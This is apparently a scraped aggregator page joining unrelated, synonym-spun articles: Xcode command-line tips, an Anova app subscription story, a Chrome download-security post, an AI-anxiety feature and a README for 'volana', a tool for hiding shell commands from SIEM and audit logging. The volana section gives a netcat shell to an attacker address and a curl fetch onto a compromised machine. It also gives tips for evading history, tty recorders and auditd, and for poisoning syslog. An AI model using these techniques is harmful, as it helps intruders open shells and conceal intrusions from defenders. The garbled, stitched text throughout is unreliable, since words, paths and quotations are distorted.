6.9 C
New York
Friday, March 28, 2025
Home Blog Page 3827

Executing command-line immediately from Xcode — Erica Sadun


I bought pulled into a type of conversations the place I find yourself saying, “Tremendous, I’ll put up a put up about it” and that is the put up. Sure, you can take a look at and run command-line apps immediately from Xcode however I just about by no means do. It’s a ache with few advantages. That stated, right here’s the way you do it.

Arguments

Let’s say you want arguments. Open your scheme (⌘<) and choose the Run > Arguments tab. Add the arguments you need to move on launch separately. Double-click to edit any argument:

The arguments are vended byCommandLine.arguments. Both depend the array or use CommandLine.argc to learn how many arguments you’re coping with.

print(CommandLine.arguments)
print(CommandLine.argc)

Counter-intuitively, Xcode doesn’t robotically quote the arguments for you. This produces 5 arguments, not three, or six in the event you embrace the command itself:

["/Users/ericasadun/Library/Developer/Xcode/DerivedData/Test-gwehknnihlcsiucsovtbnlrdtfun/Build/Products/Debug/Test", "first", "second", "third", "fourth", "fifth"]
6

And what do you anticipate from the next?

You get this in the event you run immediately in Xcode’s console:

["/Users/ericasadun/Library/Developer/Xcode/DerivedData/Test-gwehknnihlcsiucsovtbnlrdtfun/Build/Products/Debug/Test", "first", "several items at once", "third"]
4
Program ended with exit code: 0

However in the event you set your code to execute utilizing Terminal:

Launching: '/Customers/ericasadun/Library/Developer/Xcode/DerivedData/Take a look at-gwehknnihlcsiucsovtbnlrdtfun/Construct/Merchandise/Debug/Take a look at'
Working listing: '/Customers/ericasadun/Library/Developer/Xcode/DerivedData/Take a look at-gwehknnihlcsiucsovtbnlrdtfun/Construct/Merchandise/Debug'
3 arguments:
argv[0] = '/Customers/ericasadun/Library/Developer/Xcode/DerivedData/Take a look at-gwehknnihlcsiucsovtbnlrdtfun/Construct/Merchandise/Debug/Take a look at'
argv[1] = 'first'
argv[2] = 'a number of'
["/Users/ericasadun/Library/Developer/Xcode/DerivedData/Test-gwehknnihlcsiucsovtbnlrdtfun/Build/Products/Debug/Test", "first", "several"]
3

Xcode’s Loopy Terminal Choice

Should you’re working something with direct key enter (utilizing POSIX termios/uncooked mode) or curses, working within the console doesn’t work. So Xcode offers a technique to run these utilities within the terminal. Go to Run > Choices and scroll all the best way down.

This characteristic is buggy as hell, produces ridiculous quantities of extra textual content (see this), can take a major time to launch, and much more time for Xcode to comprehend the method has completed. It’s unimaginable to make use of with paths that use areas (“warning: working listing would not exist: '/Volumes/Kiku/Xcode/Derived'“).

I don’t prefer it. I don’t use it. But it surely exists.

Sane Command-Line Execution

Except you’re coping with issues like automation and such, you’ll be able to check out your compiled command-line apps by dragging your executable from the Merchandise group onto the terminal. This locations the trail to your construct on the immediate. Sort out your arguments and press return:

Nevertheless, I want to make use of a Copy File construct part. Choose your Goal > Construct Phases, click on plus (+) and add the executable. (I take advantage of absolute path and disable “solely when putting in”.) This allows you to set up on to  normal places like /usr/native/bin or ~/bin, or in the event you don’t need to place it there till it’s secure and prepared for deployment, you should use a improvement folder:

Assuming your vacation spot is in your shell’s path, begin a brand new shell for the executable to be picked up the primary time. After that, you’ll be able to compile and run as you want.

Shell Command Obfuscation To Keep away from Detection Methods

0




Shell Command Obfuscation To Keep away from Detection Methods


Shell command obfuscation to keep away from SIEM/detection system

Throughout pentest, an vital side is to be stealth. Because of this you must clear your tracks after your passage. Nonetheless, many infrastructures log command and ship them to a SIEM in an actual time making the afterwards cleansing half alone ineffective.

volana present a easy technique to conceal instructions executed on compromised machine by offering it self shell runtime (enter your command, volana executes for you). Like this you clear your tracks DURING your passage


Utilization

It’s essential get an interactive shell. (Discover a technique to spawn it, you’re a hacker, it is your job ! in any other case). Then obtain it heading in the right direction machine and launch it. that is it, now you possibly can sort the command you need to be stealthy executed

## Obtain it from github launch
## When you shouldn't have web entry from compromised machine, discover one other manner
curl -lO -L https://github.com/ariary/volana/releases/newest/obtain/volana

## Execute it
./volana

## You at the moment are beneath the radar
volana » echo "Hello SIEM workforce! Do you discover me?" > /dev/null 2>&1 #you might be allowed to be a bit cocky
volana » [command]

Key phrase for volana console: * ring: allow ring mode ie every command is launched with lots others to cowl tracks (from answer that monitor system name) * exit: exit volana console

from non interactive shell

Think about you will have a non interactive shell (webshell or blind rce), you possibly can use encrypt and decrypt subcommand. Beforehand, you should construct volana with embedded encryption key.

On attacker machine

## Construct volana with encryption key
make construct.volana-with-encryption

## Switch it on TARGET (the distinctive detectable command)
## [...]

## Encrypt the command you need to stealthy execute
## (Right here a nc bindshell to acquire a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND

Copy encrypted command and executed it along with your rce heading in the right direction machine

./volana decr [encrypted_command]
## Now you will have a bindshell, spawn it to make it interactive and use volana normally to be stealth (./volana). + Do not forget to take away volana binary earlier than leaving (trigger decryption key can simply be retrieved from it)

Why not simply conceal command with echo [command] | base64 ? And decode heading in the right direction with echo [encoded_command] | base64 -d | bash

As a result of we need to be protected towards programs that set off alert for base64 use or that search base64 textual content in command. Additionally we need to make investigation troublesome and base64 is not an actual brake.

Detection

Remember the fact that volana isn’t a miracle that can make you completely invisible. Its goal is to make intrusion detection and investigation tougher.

By detected we imply if we’re in a position to set off an alert if a sure command has been executed.

Conceal from

Solely the volana launching command line will likely be catched. 🧠 Nevertheless, by including an area earlier than executing it, the default bash conduct is to not reserve it

  • Detection programs which can be primarily based on historical past command output
  • Detection programs which can be primarily based on historical past information
  • .bash_history, “.zsh_history” and so on ..
  • Detection programs which can be primarily based on bash debug traps
  • Detection programs which can be primarily based on sudo built-in logging system
  • Detection programs tracing all processes syscall system-wide (eg opensnoop)
  • Terminal (tty) recorder (script, display screen -L, sexonthebash, ovh-ttyrec, and so on..)
  • Straightforward to detect & keep away from: pkill -9 script
  • Not a standard case
  • display screen is a little more troublesome to keep away from, nonetheless it doesn’t register enter (secret enter: stty -echo => keep away from)
  • Command detection Could possibly be keep away from with volana with encryption

Seen for

  • Detection programs which have alert for unknown command (volana one)
  • Detection programs which can be primarily based on keylogger
  • Straightforward to keep away from: copy/previous instructions
  • Not a standard case
  • Detection programs which can be primarily based on syslog information (e.g. /var/log/auth.log)
  • Just for sudo or su instructions
  • syslog file could possibly be modified and thus be poisoned as you would like (e.g for /var/log/auth.log:logger -p auth.information "No hacker is poisoning your syslog answer, don't fret")
  • Detection programs which can be primarily based on syscall (eg auditd,LKML/eBPF)
  • Troublesome to research, could possibly be make unreadable by making a number of diversion syscalls
  • Customized LD_PRELOAD injection to make log
  • Not a standard case in any respect

Bug bounty

Sorry for the clickbait title, however no cash will likely be supplied for contibutors. 🐛

Let me know if in case you have discovered: * a technique to detect volana * a technique to spy console that do not detect volana instructions * a technique to keep away from a detection system

Report right here

Credit score



‘Every little thing is a subscription now’ consists of the Anova sous vide

0


The world simply went somewhat additional down the highway of all the things changing into a subscription, with the information that the companion app for the Anova sous vide cooker will now value $2/month or $10/yr …

Sous vide cooking

For anybody unfamiliar, sous vide is a technique of cooking meals by vacuum sealing it in a plastic bag, after which immersing it in water heated to a really precisely-controlled temperature.

As a result of the meals is totally sealed, all the taste is retained, and the exact temperature management signifies that the cooking methodology delivers extremely constant outcomes.

Anova machine and app

Anova’s sous vide machine includes a programmable heating ingredient, and a companion app. The app lets you discover the proper temperatures and timings for various meals, to manage it remotely, and to obtain updates in your cellphone when the meals is prepared.

Thus far, that’s been free, as you’d anticipate from a companion app there to assist promote {hardware}. However the firm says that from tomorrow, new clients must pay for a month-to-month or annual subscription to make use of it.

The swap to subscription

Right here’s how the corporate defined the transfer:

As our neighborhood has grown, so have the calls for on our sources. Our neighborhood has actually cooked 100s of thousands and thousands of occasions with our app. Sadly, every linked prepare dinner prices us cash. So, to proceed delivering the distinctive service and modern recipes you’ve come to anticipate, we’re introducing a small subscription payment for our app. The brand new Anova Sous Vide Subscription will permit us to keep up and improve the app, guaranteeing it stays a worthwhile useful resource for all of our customers […]

The subscription will value $1.99 per 30 days or $9.99 per yr USD.

The excellent news is that current homeowners don’t should pay, and Anova says it intends (however doesn’t promise) that this may at all times stay the case.

Present clients who’ve an account with us earlier than August twenty first, 2024, is not going to be charged a subscription payment. To be an current consumer, you have to have downloaded our app AND made an account within the app earlier than August twenty first, 2024. Within the occasion you’re an current consumer, you may be grandfathered in to free utilization of the app. You helped us construct Anova and our intent is that you may be grandfathered in perpetually.

9to5Mac’s Take

Whereas I admire the corporate’s place, I can’t assist feeling like it is a damaging transfer. Whereas ten bucks a yr is a small sum within the scheme of issues, it’s taking place inside the context of a rising feeling that we’re hardly allowed to breathe lately with out taking out an oxygen subscription.

I’ve been a cheerful Anova sous vide for a few years now, and have really helpful it to many (it’s a unbelievable technique to prepare dinner superbly tender steaks, for instance, simply browning them in a pan for a couple of seconds afterwards), however I’ll now hesitate to take action.

What’s your take? Please share your ideas within the feedback.

FTC: We use earnings incomes auto affiliate hyperlinks. Extra.

Constructing safety into the redesigned Chrome downloads expertise


Final 12 months, we launched a redesign of the Chrome downloads expertise on desktop to make it simpler for customers to work together with current downloads. On the time, we talked about that the extra house and extra versatile UI of the brand new Chrome downloads expertise would give us new alternatives to verify customers keep protected when downloading recordsdata.

Including context and consistency to obtain warnings

The redesigned Chrome downloads expertise provides us the chance to offer much more context when Chrome protects a person from a doubtlessly malicious file. Benefiting from the extra house obtainable within the new downloads UI, we’ve changed our earlier warning messages with extra detailed ones that convey extra nuance concerning the nature of the hazard and can assist customers make extra knowledgeable selections.

Our legacy, space-constrained warning vs. our redesigned one

We additionally made obtain warnings extra comprehensible by introducing a two-tier obtain warning taxonomy based mostly on AI-powered malware verdicts from Google Protected Looking. These are:

  1. Suspicious recordsdata (decrease confidence verdict, unknown threat of person hurt)
  2. Harmful recordsdata (excessive confidence verdict, excessive threat of person hurt)

These two tiers of warnings are distinguished by iconography, colour, and textual content, to make it straightforward for customers to rapidly and confidently make your best option for themselves based mostly on the character of the hazard and Protected Looking’s degree of certainty. General, these enhancements in readability and consistency have resulted in vital modifications in person conduct, together with fewer warnings bypassed, warnings heeded extra rapidly, and all in all, higher safety from malicious downloads.

Differentiation between suspicious and harmful warnings

Defending extra downloads with automated deep scans

Customers who’ve opted-in to the Enhanced Safety mode of Protected Looking in Chrome are prompted to ship the contents of suspicious recordsdata to Protected Looking for deep scanning earlier than opening the file. Suspicious recordsdata are a small fraction of general downloads, and file contents are solely scanned for safety functions and are deleted shortly after a verdict is returned.

We have discovered these further scans to have been terribly profitable – they assist catch model new malware that Protected Looking has not seen earlier than and harmful recordsdata hosted on model new websites. Actually, recordsdata despatched for deep scanning are over 50x extra prone to be flagged as malware than downloads within the combination.

Since Enhanced Safety customers have already agreed to ship a small fraction of their downloads to Protected Looking for safety functions to be able to profit from further protections, we not too long ago moved in the direction of automated deep scans for these customers relatively than prompting every time. This can defend customers from dangerous downloads whereas decreasing person friction.

An automated deep scan leading to a warning

Staying forward of attackers who cover in encrypted archives

Not all deep scans will be carried out mechanically. A present development in cookie theft malware distribution is packaging malicious software program in an encrypted archive – a .zip, .7z, or .rar file, protected by a password – which hides file contents from Protected Looking and different antivirus detection scans. In an effort to fight this evasion method, we’ve launched two safety mechanisms relying on the mode of Protected Looking chosen by the person in Chrome.

Attackers usually make the passwords to encrypted archives obtainable in locations just like the web page from which the file was downloaded, or within the obtain file identify. For Enhanced Safety customers, downloads of suspicious encrypted archives will now immediate the person to enter the file’s password and ship it together with the file to Protected Looking in order that the file will be opened and a deep scan could also be carried out. Uploaded recordsdata and file passwords are deleted a short while after they’re scanned, and all collected information is barely utilized by Protected Looking to offer higher obtain protections.

Enter a file password to ship an encrypted file for a malware scan

For individuals who use Normal Safety mode which is the default in Chrome, we nonetheless needed to have the ability to present some degree of safety. In Normal Safety mode, downloading a suspicious encrypted archive may also set off a immediate to enter the file’s password, however on this case, each the file and the password keep on the native system and solely the metadata of the archive contents are checked with Protected Looking. As such, on this mode, customers are nonetheless protected so long as Protected Looking had beforehand seen and categorized the malware.

The Chrome Safety workforce works intently with Protected Looking, Google’s Risk Evaluation Group, and safety researchers from all over the world to realize insights into the strategies attackers are utilizing. Utilizing these insights, we’re always adapting our product technique to remain forward of attackers and to maintain customers protected whereas downloading recordsdata in Chrome. We look ahead to sharing extra sooner or later!

Synthetic intelligence, actual nervousness: Why we won’t cease worrying and love AI

0


abstract graphic of people looking at binary code

zf L/Getty Pictures

Did an AI write this piece? 

Questions like this had been a pleasant quip when generative synthetic intelligence (gen AI) started its foray into mainstream discourse. Two years later, whereas individuals across the globe use AI for every kind of actions, others are elevating essential questions in regards to the rising know-how’s long-term impression.

Final month, followers of the favored South Korean band Seventeen took difficulty with a BBC article that wrongly implied the group had used AI in its songwriting. Woozi, a band member and the primary artistic mind behind many of the band’s music, advised reporters he had experimented with AI to know the event of the know-how and establish its professionals and cons. 

Additionally: Misplaced in translation: AI chatbots nonetheless too English-language centric, Stanford examine finds

BBC misconstrued the experimentation to counsel Seventeen had used AI in its newest album launch. Unsurprisingly, the error induced a furor, with followers taking specific offense as a result of Seventeen has been championed as a “self-producing” band since its musical debut. Its 13 members are concerned within the group’s songwriting, music manufacturing, and dance choreography.

Their followers noticed the AI tag as discrediting the group’s artistic minds. “[Seventeen] write, produce, choreograph! They’re proficient… and positively are usually not in want of AI or the rest,” one fan stated on X, whereas one other described the AI label as an insult to the group’s efforts and success. 

The episode prompted Woozi to publish on his Instagram Tales: “All of Seventeen’s music is written and composed by human creators.”

Girls, peace, and safety

After all, AI as a perceived affront to human creativity is not the one concern about this know-how’s ever-accelerating impression on our world — and arguably removed from the most important concern. Systemic points surrounding AI might — probably — threaten the protection and well-being of giant swaths of the world’s inhabitants. 

Particularly, because the know-how is adopted, AI can put girls’s security in danger, in response to current analysis from UN Girls and the UN College Institute Macau (UNU Macau). The examine famous that gender biases throughout common AI methods pose vital obstacles to the optimistic use of AI to help peace and safety in areas akin to Southeast Asia.

The Could 2024 examine analyzed hyperlinks between AI; digital safety; and ladies, peace, and safety points throughout Southeast Asia. AI is anticipated to spice up the area’s gross home product by $1 trillion in 2030. 

Additionally: AI dangers are all over the place – and now MIT is including all of them to at least one database

“Whereas utilizing AI for peace functions can have a number of advantages, akin to enhancing inclusivity and the effectiveness of battle prevention and monitoring proof of human rights breaches, it’s used unequally between genders, and pervasive gender biases render girls much less prone to profit from the appliance of those applied sciences,” the report stated. 

Efforts ought to be made to mitigate the dangers of utilizing AI methods, notably on social media, and in instruments akin to chatbots and cell purposes, in response to the report. Efforts additionally ought to be made to drive the event of AI instruments to help “gender-responsive peace.”

The analysis famous that instruments enabling the general public to create textual content, photos, and movies have been made broadly obtainable with out consideration of their implications for gender or nationwide or worldwide safety. 

Additionally: If these chatbots might discuss: The preferred methods persons are utilizing AI instruments

“Gen AI has benefited from the publishing of huge language fashions akin to ChatGPT, which permit customers to request textual content that may be calibrated for tone, values, and format,” it stated. “Gen AI poses the danger of accelerating disinformation by facilitating the speedy creation of authentic-seeming content material at scale. It additionally makes it very straightforward to create convincing social media bots that deliberately share polarizing, hateful, and misogynistic content material.”

The analysis cited a 2023 examine through which researchers from the Affiliation for Computational Linguistics discovered that when ChatGPT was supplied with 100 false narratives, it made false claims 80% of the time.

The UN report highlighted how researchers worldwide have cautioned in regards to the dangers of deepfake pornography and extremist content material for a number of years. Nevertheless, current developments in AI have escalated the severity of the issue. 

“Picture-generating AI methods have been proven to simply produce misogynistic content material, together with creating sexualized our bodies for ladies primarily based on profile photos or photos of individuals performing sure actions primarily based on sexist and racist stereotypes,” the UN Girls report famous. 

“These applied sciences have enabled the simple and convincing creation of deepfake movies, the place false movies could be created of anybody primarily based solely on photograph references. This has induced vital issues for ladies, who may be proven, for instance, in pretend sexualized movies in opposition to their consent, incurring lifelong reputational and safety-related repercussions.”

When real-world fears transfer on-line

A January 2024 examine from data safety specialist CyberArk additionally prompt issues in regards to the integrity of digital identities are on the rise. The survey of two,000 staff within the UK revealed that 81% of workers are anxious about their visible likeness being stolen or used to conduct cyberattacks, whereas 46% are involved about their likeness being utilized in deepfakes.

Particularly, 81% of girls are involved about cybercriminals utilizing AI to steal confidential knowledge by way of digital scams, larger than 74% of males who share related issues. Extra girls (46%) additionally fear about AI getting used to create deepfakes, in comparison with 38% of males who really feel this manner.

CyberArk’s survey discovered that fifty% of girls are anxious about AI getting used to impersonate them, larger than 40% of males who’ve related issues. What’s extra, 59% of girls are anxious about AI getting used to steal their private data, in comparison with 50% of males who really feel likewise. 

Additionally: Millennial males are probably to enroll in gen AI upskilling programs, report reveals

I met with CyberArk COO Eduarda Camacho, and our dialogue touched upon why girls harbored extra nervousness about AI. Should not girls really feel safer on digital platforms as a result of they do not have to show their traits, akin to gender?

Camacho prompt that girls could also be extra conscious of the dangers on-line and these issues might be a spillover from the vulnerabilities some girls really feel offline. She stated girls are usually extra focused and uncovered to on-line abuse and misinformation on social media platforms. 

The nervousness is not unfounded, both. Camacho stated AI can considerably impression on-line identities. CyberArk focuses on id administration and is especially involved about this difficulty. 

Particularly, deepfakes could be troublesome to detect as know-how advances. Whereas 70% of organizations are assured their workers can establish deepfakes of their management group, Camacho stated this determine is probably going an overestimation, referring to proof from CyberArk’s 2024 Risk Panorama Report

Additionally: These specialists imagine AI might help us win the cybersecurity battle

A separate July 2024 examine from digital id administration vendor Jumio discovered 46% of respondents believed they might establish a deepfake of a politician. Singaporeans are essentially the most sure, at 60%, adopted by individuals from Mexico at 51%, the US at 37%, and the UK at 33%.

Allowed to run rampant and unhinged on social media platforms, AI-generated fraudulent content material can result in social unrest and detrimentally impression societies, together with susceptible teams. This content material can unfold rapidly when shared by personalities with a big on-line presence. 

Analysis final week revealed that Elon Musk’s claims in regards to the US elections — claims that had been flagged as false or deceptive — had been considered virtually 1.2 billion instances on his social media platform X, in response to analysis from the Heart for Countering Digital Hate (CCDH). From January 1 to July 31, CCDH analyzed Musk’s posts in regards to the elections and recognized 50 posts that fact-checkers had debunked. 

Musks’s publish on an AI-generated audio clip that includes US presidential nominee Kamala Harris clocked not less than 133 million views. The publish wasn’t tagged with a warning label, breaching the platform’s coverage that claims customers ought to “not share artificial, manipulated, or out-of-context media which will deceive or confuse individuals and result in hurt,” CCDH stated. 

“The dearth of Group Notes on these posts reveals [Musk’s] enterprise is failing woefully to include the type of algorithmically-boosted incitement that everyone knows can result in real-world violence, as we skilled on January 6, 2021,” stated CCDH CEO Imran Ahmed. “It’s time Part 230 of the [US] Communications Decency Act 1986 was amended to permit social media firms to be held liable in the identical manner as any newspaper, broadcaster or enterprise throughout America.” 

Additionally disconcerting is how the tech giants are jockeying for even higher energy and affect

“Watching what’s taking place in Silicon Valley is insane,” American businessman and investor Mark Cuban stated in an interview on The Day by day Present. “[They’re] attempting to place themselves able to have as a lot management as attainable. It is not a superb factor.” 

“They’ve misplaced the reference to the actual world,” Cuban stated. 

Additionally: Elon Musk’s X now trains Grok in your knowledge by default – this is choose out

He additionally stated the web attain of X offers Musk the power to hook up with political leaders globally, together with an algorithm that is dependent upon what Musk likes. 

When requested the place he thought AI is heading, Cuban pointed to the know-how’s speedy evolution and stated it stays unclear how giant language fashions will drive future developments. Whereas he believes the impression shall be typically optimistic, he stated there are loads of uncertainties. 

Act earlier than AI’s grip tightens past management

So, how ought to we proceed? First, we must always transfer previous the misunderstanding that AI is the answer to life’s challenges. Companies are simply beginning to transfer past that hyperbole and are working to find out the actual worth of AI. 

Additionally, we must always respect that, amid the need for AI-powered hires and productiveness features, some stage of human creativity remains to be valued above AI — as Seventeen and the band’s followers have made abundantly clear. 

For some, nonetheless, AI is embraced as a approach to cross language boundaries. Irish boy band Westlife, for example, launched their first Mandarin title, which was carried out by their AI-generated vocal representatives and dubbed AI Westlife. The music was created in partnership with Tencent Music Leisure Group.

Additionally: Nvidia will practice 100,000 California residents on AI in a first-of-its-kind partnership

Most significantly, because the UN report urges, systemic points with AI should be addressed — and these issues aren’t new. Organizations and people alike have repeatedly highlighted these challenges, together with a number of requires the mandatory guardrails to be put in place. Governments will want the correct rules and enforcements to rein within the delinquents.

And so they should accomplish that rapidly earlier than AI’s grip tightens past management and all of society, not simply girls, are confronted with lifelong security repercussions.